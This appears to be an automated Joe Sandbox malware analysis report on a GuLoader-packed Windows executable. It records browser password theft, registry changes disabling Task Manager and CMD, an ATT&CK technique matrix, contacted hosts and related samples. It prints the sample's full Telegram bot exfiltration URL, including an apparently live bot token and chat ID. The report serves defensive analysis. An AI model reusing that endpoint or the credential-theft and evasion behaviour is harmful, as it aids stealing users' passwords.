            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597641Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597531Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596620Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594531Jump to behavior
            Source: ajRZflJ2ch.exe, 00000005.00000002.2713839860.00000000065C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ajRZflJ2ch.exe, 00000005.00000002.2713839860.0000000006568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeAPI call chain: ExitProcess graph end nodegraph_0-4592
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeAPI call chain: ExitProcess graph end nodegraph_0-4750
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_70131B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70131B5F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess created: C:\Users\user\Desktop\ajRZflJ2ch.exe "C:\Users\user\Desktop\ajRZflJ2ch.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeQueries volume information: C:\Users\user\Desktop\ajRZflJ2ch.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ajRZflJ2ch.exe PID: 5060, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ajRZflJ2ch.exe PID: 5060, type: MEMORYSTR
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ajRZflJ2ch.exe PID: 5060, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ajRZflJ2ch.exe PID: 5060, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ajRZflJ2ch.exe PID: 5060, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            ajRZflJ2ch.exe75%VirustotalBrowse
            ajRZflJ2ch.exe61%ReversingLabsWin32.Exploit.GuLoader
            ajRZflJ2ch.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.184.206
            truefalse
              high
              drive.usercontent.google.com
              142.250.184.193
              truefalse
                high
                reallyfreegeoip.org
                104.21.48.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E80000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/ajRZflJ2ch.exe, 00000005.00000002.2713839860.0000000006568000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://reallyfreegeoip.orgajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.google.com/OajRZflJ2ch.exe, 00000005.00000002.2713839860.0000000006568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/ajRZflJ2ch.exe, 00000005.00000002.2713839860.00000000065D7000.00000004.00000020.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000003.2441082200.00000000065D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C84000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E80000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.comajRZflJ2ch.exe, 00000005.00000003.2404579364.00000000065DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E80000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorajRZflJ2ch.exefalse
                                                          high
                                                          http://api.telegram.orgajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D6B000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E80000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndns.org/U9ajRZflJ2ch.exe, 00000005.00000002.2735696215.000000003954D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.48.1
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  142.250.184.193
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  193.122.6.168
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898USfalse
                                                                  142.250.184.206
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  132.226.247.73
                                                                  unknownUnited States
                                                                  16989UTMEMUSfalse
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1588086
                                                                  Start date and time:2025-01-10 21:14:21 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 56s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:ajRZflJ2ch.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:1d703dda4c786c51432a22da942b92244544a00c1d81b937bd5e5424947804f8.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@6/6
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 161
                                                                  • Number of non-executed functions: 109
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 4.245.163.56, 13.107.246.45
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  15:17:08API Interceptor155x Sleep call for process: ajRZflJ2ch.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.21.48.1NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                  • www.axis138ae.shop/j2vs/
                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                  • twirpx.org/administrator/index.php
                                                                  SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                  • www.antipromil.site/7ykh/
                                                                  149.154.167.220FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                    https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                            FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                              ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      193.122.6.168hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      checkip.dyndns.comhZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.130.0
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 132.226.8.169
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 158.101.44.242
                                                                                      reallyfreegeoip.orghZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.32.1
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.80.1
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.64.1
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.32.1
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      api.telegram.orgFUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
